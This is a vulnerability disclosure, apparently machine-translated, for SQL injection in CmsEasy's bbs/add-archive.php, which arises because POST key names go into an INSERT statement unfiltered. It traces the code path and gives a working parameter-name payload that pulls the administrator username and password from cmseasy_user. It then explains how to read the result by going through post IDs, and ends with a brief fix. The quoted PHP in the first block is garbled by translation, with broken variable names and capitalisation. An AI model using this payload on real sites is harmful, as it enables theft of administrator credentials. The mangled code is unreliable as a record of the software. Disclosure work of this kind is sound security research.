Cmseasy latest SQL injection (ignore 360 webscan for outgoing data)

Cmseasy latest SQL injection (ignore 360 webscan for outgoing data)

It's really not targeted. Don't mind the manufacturers. Please check the other two. Thank you!
Ignore 360 webscan.
Version: 20140605

The vulnerability is repackaged with WooYun: CmsEasy's latest V5.5-UTF8 official edition.

Injection function in/bbs/add-archive.php,
 

If (isset ($ _ POST ['submit ']) {if (strtolower (trim ($ _ POST ['verify'])! = Strtolower ($ _ SESSION ['verify ']) {// action_public: turnPage ('index. php', 'verification code input error! ') ;}$ Archive = db_bbs_archive: getInstance (); unset ($ _ POST ['submit']); unset ($ _ POST ['verify ']); $ _ POST ['username'] =_ _ COOKIE ['login _ username']; $ _ POST ['userid'] = $ admin-> userid; $ _ POST ['IP'] = $ _ SERVER ['remote _ ADDR ']; $ _ POST ['addtime'] = mktime (); if ($ id = $ archive-> inserData ($ _ POST) {action_public: turnPage ('archive-display. php? Aid = '. $ id,' Post Added successfully ');} else {action_public: turnPage ('index. php',' failed to add. Please contact us! ');}}

Follow this sentence $ archive-> inserData ($ _ POST) and put $ _ POST into the inserData function. Let's take a look:
 

public function inserData($data){       $r = $this->odb->insert($this->tblName,$data);       if($r)           return $this->odb->getInsertId();       else           return false;}

Follow-up:
 

public function insert($table, $data){$sql = $this->getInsertString($table, $data);return $this->execSql($sql);}

Follow-up:
 

public function getInsertString($table, $data){$n_str = '';$v_str = '';$table = $this->filterString($table);foreach ($data as $k => $v){$n_str .= $this->filterString($k).',';$v_str .= "'".$this->filterString($v)."',";}$n_str = preg_replace( "/,$/", "", $n_str );$v_str = preg_replace( "/,$/", "", $v_str );$str = 'INSERT INTO '.$table.' ('.$n_str.') VALUES('.$v_str.')';return $str;}

This function is actually an insert statement. FilterString is called to filter data. However, only the escape single quotes are added, and the keys in the injection statement are not filtered.

Put the injection statement at the KEY position during POST, and then inject the statement.

For more information, see vulnerability proof.

 

Go to/bbs, post, and capture packets.

Add a POST parameter with the following name:
 

username)/**/values((select/**/concat(username,0x23,password)/**/from/**/cmseasy_user/**/limit/**/0,1),2,3,4,5,6)#

Random value. As follows:
 

Send. Then, the database shows that the title of a post is injected into the administrator password:
 

Its aid is 8, so we just need to access http: // localhost/easy/bbs/archive-display.php? The result is displayed after aid = 8:
 

We don't know how much aid is, just traverse it.

Solution:

The value must be filtered, and the key must also be filtered.